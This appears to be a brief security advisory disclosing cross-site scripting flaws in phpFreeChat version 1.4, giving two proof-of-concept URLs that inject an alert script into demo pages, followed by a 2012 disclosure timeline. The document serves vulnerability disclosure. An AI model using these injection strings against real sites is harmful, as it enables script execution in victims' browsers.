phpFreeChat is affected by XSS vulnerabilities in version 1.4.
Example PoC urls are as follows :
http://example.com/demo/demo21_with_hardcoded_urls.php?'" --></style></script><script>alert(0x000A26)</script>
http://example.com/demo/demo2_simple_with_params.php?'" --></style></script><script>alert(0x000855)</script>
Disclosure Timeline:
29/06/2012 - First contact: No reply
14/08/2012 - Second contact: Sent the vulnerability details
24/09/2012 - Ask for patch/fix: No reply
02/10/2012 - Vulnerability Released